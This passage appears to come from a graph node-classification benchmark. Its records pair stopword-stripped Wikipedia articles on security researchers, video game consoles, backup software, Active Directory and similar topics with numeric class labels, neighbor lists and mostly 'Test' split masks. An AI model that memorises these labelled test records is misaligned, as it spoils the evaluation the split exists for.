locksmiths inc. found cyology labs montreal quebec cyology labs focuses cyber security security testing cutler serving company chief executive officer website describes co-workers white hats fight crime liking forensic experts depicted television shows addition work cyology labs also serves vice-president cyber security sirco company specializes investigation protection services well cyber crime industrial corporate espionage april 2016 cutler appointed national council canadian cybersecurity alliance cca one twelve people responsible coordinating cca efforts 80 different groups work cca subject cyber-security cutler appointed communications lead hope would create cooperation various cyber security groups remarked complement nobody talking went state cca initiative ’ brightest minds across canada collaborating together february 2017 terry cutler named winner cybersecurity excellence award educator year annual cybersecurity excellence awards honor individuals companies demonstrate innovation excellence leadership information security across 50 product company professional award categories produced partnership information security community linkedin awards program taps vast experience 300,000 cybersecurity professionals recognize world ’ best cybersecurity products professionals organizations hundreds entries every year awards highly competitive reflect dynamic pace growth innovation cybersecurity marketplace also february 2017 terry cutler featured robert guy scully ’ discuss vulnerable data really chilling real-life stories identity stolen nose one click mouse propelling us nightmares matter minutes anytime anywhere one darling gadgets august 2017 terry cutler ’ blog terrycutler.com voted top 75 best hacker blogs internet feedspot made list 2018 2019 blogs ranked based following criteria · google reputation google search ranking · influence popularity facebook twitter social media sites · quality consistency posts · feedspot ’ editorial team expert review november 2017 terry cutler 2 prestigious international cyber security intelligence awards academic well leadership event hosted ontario college management technology international cyber security intelligence conference provides rare opportunity global experts cyber security intelligence counter-terrorism national infrastructure industry cyber operations research law enforcement legal practitioners proffer unified ideas best practices cyber safety attacks prevention secured cyber world international cyber security intelligence conference unique cyber security intelligence conference features high profile speakers cyber security privacy intelligence national critical infrastructure counter-terrorism attendees unique privilege interact best brains industry academic award global campaign defensive cyberspace intelligence security program may finalized without acknowledging contributions academic world award category recognizes effort talented professionals pedagogical skills cybersecurity intelligence leadership award category rewards professionals chief information security officers ciso chief cyber security officers ccso project managers consultants substantially contributed cybersecurity communities selfless service cybersecurity project management project coordination nominee must undertaken projects programs value financial impact considered award june 2018 terry cutler named 1 ifsec global ’ top 20 influential people cybersecurity judges impressed volume nominations received – far outstripping anyone else category – persuasiveness “ ability connect students talent teaching simple concepts well advanced topics truly superior ” said one many admirers terry cutler ’ internet training courses “ easily helped million people ” words someone nominated terry cutler one six canadians recognized security influencers according ifsec influencers judged based following criteria · someone played key role driving technological innovation · someone driving force changing regulation standards/guidance best practice · someone whose insights/opinions widely respected influential shaping debate aroundindustry issues · someone instrumental success organisation business lead employed · someone helped raise industry ’ profile influential voice national media may 2016 terry cutler created term cyologist describe someone works field cyber security granted trademark term canada trademark definition listed term among activities consulting services field testing assessing networked devices cyber security vulnerabilities risks well educational services namely conducting courses seminars training field internet security internet safety responsible use internet computers internet enabled devices 2013 article cutler described various aspects work digital locksmiths later cyology labs instance trying gain access company system obtain sensitive data part company analysis work includes trying gain entry firewalls outside various means keystroke logging denial-of-service attacks addition computer hacking cutler would use tricks get inside access describing strategy would leave usb key bathroom wait someone company plug example cited used illustrate ways hackers try gain access sensitive data highlighting often ignored aspects data security outside work cutler long time practitioner up-close magic performing tricks illusions family friends also practitioner martial arts form aikido",
    "neighbors": [
      8978,
      357
    ],
    "mask": "None"
  },
  {
    "node_id": 918,
    "label": 4,
    "text": "Chris_Valasek:chris valasek chris valasek computer security researcher cruise automation self-driving car startup owned gm best known work automotive security research prior current employment worked ioactive coverity accuvant ibm valasek holds bachelors computer science university pittsburgh currently lives pittsburgh pennsylvania valasek publicly demonstrated many security vulnerabilities particular focus microsoft windows heap exploitation 2009 presentation practical windows xp/2003 heap exploitation blackhat presented novel approach gaining elevated access windows environment later research 2010 paper understanding low fragmentation heap allocation exploitation demonstrated ways circumvent vendor mitigations approaches outlined prior work since 2013 gained global notoriety research charlie miller automotive security research demonstrating number attack vectors ecus automotive control networks together miller produced survey remote attack surfaces then-current model year automobiles important first step establishing state art automotive security safety research https //www.usatoday.com/story/tech/talkingtech/2017/07/31/gms-self-driving-car-unit-cruise-hires-famous-car-hackers/525651001/",
    "neighbors": [
      6368,
      6797,
      4212,
      3323,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 919,
    "label": 3,
    "text": "Choplifter:choplifter choplifter stylized choplifter 1982 apple ii game developed dan gorlin published brøderbund ported atari 5200 atari 8-bit family colecovision commodore 64 commodore vic-20 msx thomson computers graphically enhanced versions atari 8-bit family atari 7800 published 1988 atari corporation 1985 sega released coin-operated arcade remake turn ported nintendo entertainment system master system 1986 choplifter one games first appeared home system ported arcade choplifter player assumes role combat helicopter pilot player attempts save hostages held prisoner war camps territory ruled evil bungeling empire player must collect hostages transport safely nearby friendly base fighting hostile tanks enemy combatants according backstory helicopter parts smuggled country described mail-sorting equipment although iran hostage crisis ended year game released gorlin stated tie-in current events something never really crossed mind published helicopter face three directions left right forward facing player may shoot enemies directions need fly direction facing forward-facing mode used primarily shoot tanks player must careful protect hostages enemy fire well accidental friendly fire player rescues prisoners first shooting one hostage buildings release landing allow prisoners board sortie returning player starting point four buildings holds 16 hostages 16 passengers carried time several trips must made chopper full hostages attempt board wave helicopter wait return usually trip back risky previous one since enemy alerted deployed counter-attack player lands directly top hostage completely blocks building exit hostages killed apple ii atari 7800 versions hostages also die vehicle landed correctly slightly tilted crushed attempt board chopper grounded helicopter may attacked enemy tanks shoot returning air also enemy scrambles jet fighters attack vehicle air air-to-air missiles ground bombs coming stint working rand corporation lead designer dan gorlin initially developed choplifter using apple ii loaned grandfather game developed six months gorlin began experimenting animating helicopter apple ii added scenery tanks planes hostages added last stated story developed movie camera techniques seemed appropriate including final message end instead game gorlin first demonstration brøderbund realistic much helicopter simulation company helped make easier fly concept rescuing hostages came gorlin learned defender player must protect people ground first gorlin imagined choplifter 3d game switched traditional 2d game environment due technical limitations gorlin would later revisit 3d concept failed attempt remake game 1990s original choplifter art brøderbund commodore 64 release produced marc ericksen created art brøderbund first five covers softline 1982 called game may well first interactive computer-assisted animated movie fusion arcade gaming simulation filmic visual aesthetics choplifter destined occupy place software hall fame magazine praised animation helicopter subtle flight control concluded seeing hostages hope excitement faith made game hard play hurts see one lively people killed 1983 readers named choplifter fourth magazine top thirty list atari 8-bit programs popularity byte called choplifter great fun computer gaming world creative computing video arcade games commodore 64 home companion praised graphics animation latter stating little captives running across desert almost seem alive apple ii version game received certificate merit category best computer audiovisual effects 4th annual arkie awards shortly afterward billboard named computer game year addison-wesley book atari software 1984 gave game overall a+ rating calling masterpiece book concluded concept graphics animation make delightful game debuting may 1982 game sold 9,000 copies june appearing computer gaming world list top sellers ii computing listed choplifter seventh magazine list top apple ii games late 1985 based sales market-share data choplifter ii subtitled rescue survive released game boy 1991 remade game boy game gear choplifter iii 1994 unrelated choplifter iii released super nes sega released pair spiritual successors without choplifter brand programmer botti cited choplifter major inspiration 1996 game black dawn inxile entertainment released choplifter hd xbox live arcade playstation network windows january 11 2012 ouya august 2013",
    "neighbors": [
      3307,
      6797,
      9006,
      2159,
      10931
    ],
    "mask": "Test"
  },
  {
    "node_id": 920,
    "label": 1,
    "text": "Atlas_of_Australian_Birds:atlas australian birds atlas australian birds major ongoing database project initiated managed birdlife australia formerly royal australasian ornithologists union map distribution australia bird species birdlife australia not-for-profit bird research conservation organisation bird atlasses produced various countries islands around world australian project first cover entire continent volunteers collected data australian birds order establish database publish book atlas australian birds 1984 summarising findings second period fieldwork nearly 20 years later resulted publication second book new atlas australian birds 2002 however atlas ongoing project idea australian bird atlas based data collected volunteer observers atlassers first mooted 1972 daunting scale task however test feasibility pilot atlas carried southern coast new south wales march 1973 september 1974 168 volunteers covering area 13,600 square kilometres august 1974 16th international ornithological congress held canberra providing opportunity discussions ornithologists involved atlas schemes outside australia leading decision proceed recognised although fieldwork would carried volunteers funding project management required february 1976 raou received grant australian government enabling appointment full-time staff member whose first task search existing ornithological literature records suitable complementary historical atlas discussions 1976 produced decisions main atlas project would structured organised methodology kept simple atlassers used maps determine locate one degree grid square recorded species birds seen within date location species data recorded survey sheets later entered hand computer database fieldwork began 1 january 1977 ended five years later 31 december 1981 data received every single one-degree block australian continent tasmania adjacent islands 3000 atlassers completing 90,000 survey sheets producing 2.7 million records sightings 716 bird species course atlas fieldwork period chair raou atlas committee pauline reilly project manager margaret blakers 1984 book published results 1987 spin-off book atlas victorian birds published jointly raou victorian department conservation forests lands covering state victoria higher 10-minute resolution detail reporting rates seasonal variations 20 years commencement fieldwork first atlas 1997 birds australia began negotiations environment australia towards obtaining funding new atlas project 1998 grant natural heritage trust bushcare wetlands programs approved fieldwork began august 1998 continued since though four years funding cut-off well deadline book publication purposes late 2002 methodology based first atlas improved use gps receivers scannable survey sheets four-year period 7,000 atlassers completed 279,000 surveys producing 4.7 million records 772 bird species coverage greater first atlas since well australian continent major islands second atlas included records australia territorial waters external territories christmas island cocos keeling islands norfolk island first atlas results published book new atlas australian birds atlas ongoing phase accepting electronic survey forms via birdata website analysis atlas data published birdlife australia report series end five-year data collection first atlas beginning fieldwork second atlas little atlassing took place national level however since end cut-off period inclusion data second atlas book atlassing continued database contains complete dataset two hard-copy atlasses published much additional material gathered since birds australia claims atlas database one important environmental databases world stated aims atlas australian birds project success project prompted launch number similar projects one notable example banksia atlas distribution atlas banksia species greatly increased knowledge banksia species distributions habitat even resulted discovery two new species",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 921,
    "label": 3,
    "text": "Atari_Jaguar:atari jaguar atari jaguar home video game console developed atari corporation console sixth programmable console developed atari brand originally released north america november 1993 also last atari console use physical media controversially atari marketed jaguar first 64-bit video game console competing existing 16-bit consoles sega genesis super nintendo entertainment system 32-bit 3do interactive multiplayer platform launched year development atari jaguar started early 1990s flare technology console released test markets new york city san francisco november 1993 general public 1994 jaguar shipped cybermorph pack-in game multi-chip architecture hardware bugs lacking developer support tools made game development difficult underwhelming sales contributed console lack third-party support addition lack internal development atari led games library comprising 50 licensed titles plus another 13 games jaguar cd atari attempted extend lifespan system atari jaguar cd add-on marketing jaguar low-cost next generation console price tag 100 less competitors release sega saturn sony playstation 1995 sales jaguar continued fall ultimately selling 250,000 units discontinued 1996 commercial failure jaguar prompted atari leave video game console market hasbro interactive bought atari late 1990s patents jaguar released public domain console declared open platform since jaguar gained cult following developer base produces homebrew games console jaguar developed members flare technology company formed martin brennan john mathieson team claimed could make console superior genesis super nes could also cost-effective impressed work konix multisystem atari persuaded close flare form new company called flare ii atari providing funding flare ii initially set work designing two consoles atari corp. one 32-bit architecture codenamed panther 64-bit system codenamed jaguar however work jaguar design progressed faster expected atari corp. canceled panther project focus promising jaguar jaguar unveiled august 1993 chicago consumer entertainment show jaguar introduced 1993 price 249.99 500 million manufacturing deal ibm system initially available test markets new york city san francisco slogan math claiming superiority competing 16-bit 32-bit systems u.s.-wide release followed six months later early 1994 computer gaming world wrote january 1994 jaguar great machine search developer/customer base atari overcome stigma name lack marketing customer support well poor developer relations past company ventured late third party software support competing console 3do 18 month public relations blitz would result avalanche software support magazine reported atari jaguar struggled attain substantial user base 1993 atari reported shipped 17,000 units part system initial test market end 1994 atari reported sold approximately 100,000 systems reduced price improve competitive nature console end 1995 sony sega entered marketplace competing consoles atari sales declined rapidly atari 1995 annual report noted addition atari corp. severely limited financial resources could create level marketing historically backed successful gaming consoles 1995 interview next generation then-ceo sam tramiel declared jaguar powerful powerful sega saturn slightly weaker playstation next generation received deluge letters response tramiel comments particularly threat bring sony court price dumping playstation entered u.s. market retail price 300 remark small number third party jaguar games good atari profitability angered jaguar owners already frustrated games coming system jaguar underlying hardware crippled flaw cpu memory controller prevented code execution system ram less severe defects included buggy uart memory controller flaw could mitigated mature code-development environment unburden programmer micromanage small chunks code jaguar development tools left much programmer implementation documentation incomplete design specs console allude gpu dsp capable acting cpu leaving motorola 68000 read controller inputs atari leonard tramiel also specifically suggested 68000 used developers practice however many developers used motorola 68000 drive gameplay logic due greater developer familiarity 68000 bugs made using custom chips difficult lacking developer support tools particularly early adequacy 68000 certain types games atari corp. tried play competing consoles proclaiming jaguar 64-bit system claim questioned cpu 68000 gpu executed 32-bit instruction-set sent control signals 64-bit graphics co-processors graphics accelerators atari corp. reasoning 32-bit tom jerry chips work tandem add 64-bit system ridiculed mini-editorial electronic gaming monthly commented sega math sega saturn way atari math 64-bit jaguar system sega saturn would 112-bit monster machine side next generation giving mostly negative review jaguar maintained true 64-bit system since data path dram cpu tom jerry chips 64 bits wide end 1995 atari revenues declined half us 38.7 million 1994 14.6 million 1995 late 1995 atari corp. ran early-morning infomercial advertisements enthusiastic salesmen touting powerful game system infomercials ran year significantly sell remaining stock jaguar systems november 1995 mass layoffs insider statements fueling journalistic speculation atari ceased development manufacturing jaguar simply trying sell existing stock exiting video game industry though atari corp. continued deny theories going 1996 core jaguar developers high voltage software beyond games stated longer receiving communications atari regarding jaguar projects 10-k405 sec filing filed april 12 1996 atari informed stockholders truly dire nature jaguar business filing also confirmed theory atari given jaguar late 1995 subsequent months concerned chiefly liquidating inventory jaguar products april 8 1996 atari corp. merged jt storage reverse takeover jaguar software reference manual page 1 jaguar custom chip set primarily intended heart high-performance games/leisure computer may also used graphics accelerator complex systems applied workstation business uses well general purpose cpu jaguar contains four processing units object processor graphics processor blitter digital sound processor jaguar provides blocks 64-bit data path external memory devices capable high data transfer rate external dynamic ram atari games licensed atari jaguar chipset use arcade games system named cojag coin-op jaguar replaced 68000 68020 mips r3000-based cpu depending board version added ram full 64-bit wide rom bus jaguar rom bus 32-bit optionally hard drive titles freeze rom ran lightgun games area 51 maximum force released atari dedicated cabinets area 51/maximum force combo machine games 3 3 basketball fishin frenzy freeze vicious circle developed never released atari jaguar duo proposed console similar turboduo genesis cdx attempt atari combine atari jaguar atari jaguar cd make new console prototype model described journalists resembling bathroom scale unveiled 1995 winter consumer electronics show console cancelled production could begin prior launch console november 1993 atari announced variety peripherals add-ons jaguar released console lifespan included cd-rom-based add-on console dial-up internet link support online gaming virtual reality headset mpeg-2 video card however due poor sales eventual commercial failure jaguar peripherals development scrapped peripherals add-ons released atari jaguar redesigned controller adapter four players cd console add-on link cable local area network lan gaming redesigned second controller jaguar procontroller atari added three face buttons two triggers controller created response criticism original controller console came said possess enough buttons fighting games particular sold independently however never bundled system release peripheral allowed 4 controllers plugged console also released dubbed team tap released independently bundle white men ca n't jump however team tap compatible white men ca n't jump nba jam tournament edition eight player gameplay team tap peripheral also possible second team tap plugged second controller port console neither compatible games supports eight players local area network multiplayer gameplay achieved use jaglink interface allowed two jaguar consoles linked together modular extension utp phone cable jaglink compatible three games aircars battlesphere doom 1994 ces atari announced partnered phylon inc. create jaguar voice/data communicator unit delayed eventually 1995 mass production canceled together estimated 100 made jaguar voice modem jvm became known utilized 19.9kbit/s dial modem ability answer incoming phone calls store 18 phone numbers players required directly dial online game play jaguar game supports jvm ultra vortek modem initialized ultra vortek start screen entering 911 key pad atari jaguar cd add-on jaguar made use cd-roms distribute games released september 1995 two years jaguar launch twelve games released system manufacturing lifetime made later homebrew developers jaguar cd unit came virtual light machine displayed light patterns corresponding music user inserts audio cd console developed jeff minter created program experimenting graphics development tempest 2000 program deemed spiritual successor atari video music system served similar purpose released 1976 additional accessory jaguar cd allowed jaguar cd games save persistent data preferences saved games also released known memory track cartridge contained 128 k eeprom inserted cartridge slot jaguar cd user played jaguar cd game program manager memory track accessed pushing option button system starting exited pushing keys simultaneously plans make second model jaguar console combined jaguar jaguar cd one unit la turboduo originally codenamed jaguar iii later jaguar duo proposed model scrapped discontinuation jaguar virtual reality headset compatible console tentatively titled jaguar vr unveiled atari 1995 winter consumer electronics show development peripheral response nintendo virtual reality console virtual boy announced previous year headset developed cooperation virtuality previously created many virtual reality arcade systems already developing similar headset practical purposes named project elysium ibm peripheral targeted commercial release christmas 1995 however deal virtuality abandoned october 1995 atari merger jts 1996 prototypes headset allegedly destroyed however two working units one low-resolution prototype red grey-colored graphics one high-resolution prototype blue grey-colored graphics since recovered regularly showcased retrogaming-themed conventions festivals one game developed jaguar vr prototype 3d-rendered version 1980 arcade game missile command entitled missile command 3d though demo virtuality zone hunter also created jaguar vr demonstrations unofficial expansion peripheral atari jaguar dubbed catbox released rockford illinois company icd originally slated released early jaguar life second quarter 1994 actually released mid-1995 icd catbox plugs directly av/dsp connectors located rear jaguar console provides three main functions audio video communications features six output formats three audio line level stereo rgb monitor headphone jack volume control three video composite s-video rgb analog component video making jaguar compatible multiple high quality monitor systems multiple monitors time capable communications methods known catnet rs-232 well dsp pass allowing user connect two jaguars together multiplayer games either directly modems icd catbox features polished stainless steel casing red leds jaguar eyes logo indicate communications activity ibm at-type null modem cable may used connect two jaguars together catbox also compatible atari jaglink interface peripheral adaptor jaguar allows webtv access revealed 1998 one prototype known exist reviewing jaguar weeks prior launch gamepro gave thumbs sideways praised power hardware criticized controller dubious software lineup would turn commenting atari failure secure support key third party publishers capcom bad sign concluded like 3do jaguar risky investment – quite expensive jaguar gamefan best new system award 1993 small size poor quality jaguar game library became commonly cited reason failure marketplace pack-in game cybermorph despite impressive polygonal game time criticized design flaws weak color palette compared unfavorably snes star fox early releases like trevor mcfur crescent galaxy raiden also received poor reviews latter two failing take full advantage jaguar hardware jaguar eventually earn praise titles tempest 2000 doom wolfenstein 3d successful title jaguar first year alien vs predator alien vs predator tempest 2000 named among system defining titles gamepro 2007 however occasional successes seen insufficient jaguar competitors receiving continual stream critically acclaimed software gamepro concluded rave review alien vs.predator remarking atari turn dozen games like avp jaguar owners could truly rest easy enjoy purchase late 1995 review jaguar next generation commented thus far atari spectacularly failed deliver software side leaving many question actual quality capability hardware one two exceptions – tempest 2000 cited frequently – truly great games jaguar noted atari well known older gamers company much less overall brand recognition sega sony nintendo even 3do company however argued low price point jaguar might still compete atari could improve software situation gave system two five stars small library games challenge incumbent 16-bit game consoles jaguar appeal never grew beyond small gaming audience digital spy commented like many failed hardware ventures still maintains something cult following considered misstep atari 2006 ign editor craig harris rated standard jaguar controller worst game controller ever criticizing unwarranted recycling 1980s phone keypad format small number action buttons found particularly unwise given atari actively trying court fighting game fans system ed semrad electronic gaming monthly commented many jaguar games gratuitously used controller phone keypad buttons making controls much difficult needed gamepro watch dog remarked controller usually n't use keypad games use keypad extensively alien vs predator doom keypad overlay used minimize confusion yes lot buttons nuttin atari added action buttons pro controller improve performance fighting games particular atari corporation properties bought hasbro interactive late 1990s hasbro released rights jaguar declaring console open platform opening doors homebrew development developers including telegames songbird productions released previously unfinished materials jaguar past several brand new titles satisfy system cult following united kingdom 2001 deal struck telegames retailer game bring jaguar game retail outlets machine initially sold £29.99 brand new software prices ranged £9.99 common games doom ruiner pinball £39.99 sought-after releases defender 2000 checkered flag machine presence stores 2007 remaining consoles sold £9.99 games sold low 97p imagin systems manufacturer dental imaging equipment since purchased molding plates jaguar casing minor modification found right size housing hotrod camera game cartridge molds reused create optional memory expansion card december 2014 molds console cartridges purchased imagin systems mike kennedy owner kickstarter funded retro videogame magazine propose new crowdfunded video game console called retro vgs later rebranded coleco chameleon entering licensing agreement coleco purchase molds imagin systems far cheaper designing manufacturing entirely new molds kennedy described acquisition entire reason retro vgs possible however project terminated march 2016 following criticism kennedy doubts regarding demand proposed console two prototypes discovered fakes coleco withdrew project project termination molds sold albert yarusso founder atariage website",
    "neighbors": [
      3074,
      3075,
      9091,
      7051,
      10658,
      8355,
      5285,
      9391,
      1717,
      11447,
      10316,
      2383,
      3793,
      8917,
      7269,
      5736,
      7912,
      6250,
      3307,
      7916,
      8937,
      1776,
      1011,
      2547,
      7286,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 922,
    "label": 4,
    "text": "BackupAssist:backupassist backupassist backup software physical virtual windows servers supports on-site cloud backup allows users restore anything files entire server bare-metal recovery software modular meaning customers pick choose want backup software suite providing core product backupassist several optional add-ons backupassist perform several kinds backup offering different level redundancy data loss full image backup backupassist takes image physical virtual system used perform full recovery even whole system lost corrupted destroyed first full backup rest performed incrementally meaning changes since last backup saved selected items backup selected files folders apps hyper-v guests databases drives archival backups highly compressed encrypted backups old unused data ready cold storage continuous sql backup continuous backup sql server potential data loss minimized e.g transactions backups compressed encrypted 256-bit aes cloud backups deduplicated order reduce backup size transfer times storage costs backup media supported backupassist 10 local disk nas san iscsi rdx usb hdd tape public cloud microsoft azure aws s3 private cloud data recovery performed scale complete granular instance exchange server restored entirety database individual mail items e.g e-mails attachments calendars contacts backupassist includes backup search tool allows user search backups currently connected searching backup libraries made backup performed much like google also supports wildcard searches backupassist hyper-v advanced add-on lost damaged hyper-v guests instantly brought back online lost damaged user run guest backup media ensure zero downtime happens full recovery performed background virtual machines backupassist licensed per host per socket vm backupassist includes recovery app called recoverassist acts boot environment performing bare-metal recovery environment includes dozen well-known third-party disaster recovery diagnostic apps backupassist support team also contacted within boot environment multiple installations backupassist managed remotely via web app called multisite manager management performed wan lan machine backup job level app data backup restore jobs remotely scheduled app also allows remote deployment backupassist machines without remote report license management user accounts created selected site permissions backupassist started software project designed overcome shortcomings ntbackup windows nt 2000 2002 backupassist released since expanded humble roots cater sorts data solutions 2017 backupassist customers 165 countries worldwide including nasa fortune 500 companies",
    "neighbors": [
      7905,
      11201,
      5482,
      1358,
      7983,
      1935,
      9655
    ],
    "mask": "Test"
  },
  {
    "node_id": 923,
    "label": 4,
    "text": "Project_Honey_Pot:project honey pot project honey pot web-based honeypot network uses software embedded web sites collects information ip addresses used harvesting e-mail addresses spam bulk mailing e-mail fraud project also solicits donation unused mx entries domain owners 2007 project began number new initiatives including quicklinks program makes easier people participate well system track comment spam project also launched free new service called http bl leverages data allow website administrators keep malicious web robots sites addition collecting information made available top 25 list periodic intervals project organizers also help various law enforcement agencies combat private commercial unsolicited bulk mailing offenses overall work reduce amount spam sent received internet information collected also used research development newer versions software improve efforts group whole project honey pot founded managed unspam technologies inc.. addition various law enforcement agencies group affiliates internet law group viawest",
    "neighbors": [
      9256,
      8956
    ],
    "mask": "Test"
  },
  {
    "node_id": 924,
    "label": 7,
    "text": "Uptake_(business):uptake business uptake industrial artificial intelligence ai software company aims help companies digitally transform open purpose-built software built around foundation data science machine learning uptake ’ core products include asset performance management application fully managed platform uptake ’ industry-specific content including asset strategy library asl provides access deep domain knowledge guidance failure prevention asl largest market today approximately 800 equipment types 58,000 failure modes 180,000 reportable conditions uptake co-founded brad keywell eric lefkofsky chicago illinois 2014 uptake incorporated 2014 located chicago offices san francisco houston albuquerque riyadh mississauga march 2015 caterpillar announced minority investment uptake aim joint development systems monitor improve use nearly 3 million pieces caterpillar equipment field caterpillar ’ core business offerings completed mid 2016 september 21 2016 progress rail formed strategic partnership launching emd uptime uptake condition monitoring march 2 2017 warren buffett berkshire hathaway energy 84 billion portfolio companies primarily renewables space announced deal uptake two bhe subsidiaries bhe renewables midamerican energy company use uptake software connect track fleet wind turbines june 2018 uptake announced u.s. army would using software improve readiness dozen bradley fighting vehicles february 2018 uptake announced hire ganesh bell former chief digital officer general electric co ge.n president october 27 2015 uptake announced raised 45 million venture capital led greatpoint ventures existing investors including new enterprise associates caterpillar uptake ’ valuation estimated one billion dollars making third unicorn state illinois february 1 2017 investor revolution growth firm started steve case donn davis ted leonsis announced would backing uptake 40 million part series c round valued uptake 2 billion november 2017 uptake closed series round 117 million post-money valuation 2.3 billion brought uptake total funding 250 million uptake recipient 2015 moxie award best new startup chicago uptake named forbes hottest new startup 2015 february 9 2017 pitchbook named uptake fastest us startup reach 2b valuation cnbc ranked uptake disruptor 50 list two consecutive years 2017 2018 respectively uptake recognized 2017 technology pioneer world economic forum june 14 2017 uptake ranked 22 2017 forbes 100 list best private cloud companies world uptake ranked 12 fortune ’ 2018 best places work chicago uptake founder brad keywell named ey world entrepreneur year 2019 marking record third win us competition ’ 19-year history",
    "neighbors": [
      924
    ],
    "mask": "Test"
  },
  {
    "node_id": 925,
    "label": 4,
    "text": "Windows_SteadyState:windows steadystate windows steadystate formerly shared computer toolkit discontinued freeware tool developed microsoft gives administrators enhanced options configuring shared computers hard drive protection advanced user management primarily designed use computers shared many people internet cafes schools libraries steadystate available december 31 2010 microsoft 32-bit versions windows xp windows vista incompatible windows 7 later similar disk protection component included windows multipoint server 2012 steadystate revert computer previously stored state every time reboots administrator request windows disk protection wdp component steadystate turned changes hard disk redirected temporary cache wdp offers three modes protection steadystate prepare user environments user accounts locked forced log certain intervals locked account uses temporary copy user profile user session user logs temporary profile deleted ensures changes user made session permanent steadystate provides simple control 80 restrictions covering individual users well system whole many settings based windows group policies others implemented steadystate using steadystate administrator forbid user performing actions may undesirable environment settings include ability turn control panel disable windows registry editing tools come windows disable windows command prompt stop users executing batch files programs outside pre-approved folders computer settings also applied since steadystate would normally remove windows updates security patches installed steadystate configured check apply updates manner removed upon rebooting administrators also choose make system-wide changes disabling welcome screen removing shutdown dialog logon screen hiding built-in windows administrator account administrator block access specified programs per-user basis steadystate presents list programs found program files directory windows common desktop programs locations added manually microsoft discontinued steadystate longer available download support available june 30 2011 microsoft support website microsoft claims still possible prepare shared computer using native features windows 7 system restore effect microsoft published creating steady state using microsoft technologies technet library however document introduce replacement wdp windows 8.1 added new feature called assigned access restricts windows device running predetermined metro-style app",
    "neighbors": [
      5380,
      106,
      7983,
      7380,
      8572,
      5018,
      3484,
      925,
      7583
    ],
    "mask": "None"
  },
  {
    "node_id": 926,
    "label": 2,
    "text": "Guadalinex:guadalinex guadalinex ubuntu-based operating system promoted government andalusia spain used schools public libraries centers elderly people guadalinfo centers five different versions guadalinex",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      5397,
      3478,
      4887,
      8727,
      10394,
      8476,
      10780,
      673,
      3745,
      5410,
      10530,
      6393,
      9253,
      10149,
      11305,
      7854,
      7983,
      8112,
      2738,
      4790,
      823,
      439,
      56,
      59,
      7483,
      10860,
      3903,
      10687,
      4673,
      3654,
      2375,
      4039,
      5962,
      8907,
      1107,
      1110,
      4951,
      9693,
      3550,
      5343,
      4192,
      6625,
      2914,
      7140,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      9324,
      7534,
      2671,
      7920,
      8177,
      2930,
      5363,
      1396,
      3189,
      9074,
      9461,
      9971,
      5369,
      5755,
      11388,
      8957
    ],
    "mask": "Test"
  },
  {
    "node_id": 927,
    "label": 6,
    "text": "Inode_pointer_structure:inode pointer structure inode pointer structure structure adopted inode file unix file system ufs list addresses file data blocks also adopted many related file systems including ext3 file system popular linux users past structure may consisted eleven thirteen pointers modern file systems use fifteen pointers pointers consist assuming 15 pointers inode structure partially illustrated diagram accompanying article structure allows inodes describe large files file systems fixed logical block size central mechanism blocks addresses also called indirect blocks allocated needed example 12-block file would described using inode blocks fit number direct pointers available however 13-block file needs indirect block contain thirteenth address inode pointer structure allows files easily allocated non-contiguous blocks also allows data particular location inside file easily located possible logical block size fixed example block 8 kb file data 112 kb 120 kb would pointed third pointer first indirect block assuming twelve direct pointers inode pointer structure unlike inodes fixed number allocated special part file system indirect blocks may number allocated part file system data blocks number pointers indirect blocks dependent block size size block pointers example 512-byte block size 4-byte block pointers indirect block consist 128 512 4 pointers",
    "neighbors": [
      1316,
      4708,
      1927,
      8298,
      8395,
      2199
    ],
    "mask": "None"
  },
  {
    "node_id": 928,
    "label": 4,
    "text": "Alexander_Sotirov:alexander sotirov alexander sotirov computer security researcher employed determina vmware 2012 sotirov co-founded new york based trail bits dino dai zovi dan guido currently serves chief scientist well known discovery ani browser vulnerability well so-called heap feng shui technique exploiting heap buffer overflows browsers 2008 presented research black hat showing bypass memory protection safeguards windows vista together team industry security researchers academic cryptographers published research creating rogue certificate authority using collisions md5 cryptographic hash function december 2008 sotirov founder organizer pwnie awards program committee 2008 workshop offensive technologies woot '08 served black hat review board since 2011 ranked 6 violet blue list top 10 sexy geeks 2009",
    "neighbors": [
      161,
      1505,
      2275,
      517,
      8167,
      6153,
      9424,
      11605,
      9271,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 929,
    "label": 2,
    "text": "Active_Directory:active directory active directory ad directory service developed microsoft windows domain networks included windows server operating systems set processes services initially active directory charge centralized domain management starting windows server 2008 however active directory became umbrella title broad range directory-based identity-related services server running active directory domain service ad ds called domain controller authenticates authorizes users computers windows domain type network—assigning enforcing security policies computers installing updating software example user logs computer part windows domain active directory checks submitted password determines whether user system administrator normal user also allows management storage information provides authentication authorization mechanisms establishes framework deploy related services certificate services active directory federation services lightweight directory services rights management services active directory uses lightweight directory access protocol ldap versions 2 3 microsoft version kerberos dns active directory like many information-technology efforts originated democratization design using request comments rfcs internet engineering task force ietf oversees rfc process accepted numerous rfcs initiated widespread participants active directory incorporates decades communication technologies overarching active directory concept makes improvements upon example ldap underpins active directory also x.500 directories organizational unit preceded active directory concept makes use methods ldap concept began emerge even founding microsoft april 1975 rfcs early 1971 rfcs contributing ldap include rfc 1823 ldap api august 1995 rfc 2307 rfc 3062 rfc 4533 microsoft previewed active directory 1999 released first windows 2000 server edition revised extend functionality improve administration windows server 2003 additional improvements came subsequent versions windows server windows server 2008 additional services added active directory active directory federation services part directory charge management domains previously core part operating system renamed active directory domain services adds became server role like others active directory became umbrella title broader range directory-based services according bryon hynes everything related identity brought active directory banner active directory services consist multiple directory services best known active directory domain services commonly abbreviated ad ds simply ad active directory domain services ad ds cornerstone every windows domain network stores information members domain including devices users verifies credentials defines access rights server running service called domain controller domain controller contacted user logs device accesses another device across network runs line-of-business metro-style app sideloaded device active directory services excluding lds described well microsoft server technologies rely use domain services examples include group policy encrypting file system bitlocker domain name services remote desktop services exchange server sharepoint server active directory lightweight directory services ad lds formerly known active directory application mode adam light-weight implementation ad ds ad lds runs service windows server ad lds shares code base ad ds provides functionality including identical api require creation domains domain controllers provides data store storage directory data directory service ldap directory service interface unlike ad ds however multiple ad lds instances run server active directory certificate services ad cs establishes on-premises public key infrastructure create validate revoke public key certificates internal uses organization certificates used encrypt files used encrypting file system emails per s/mime standard network traffic used virtual private networks transport layer security protocol ipsec protocol 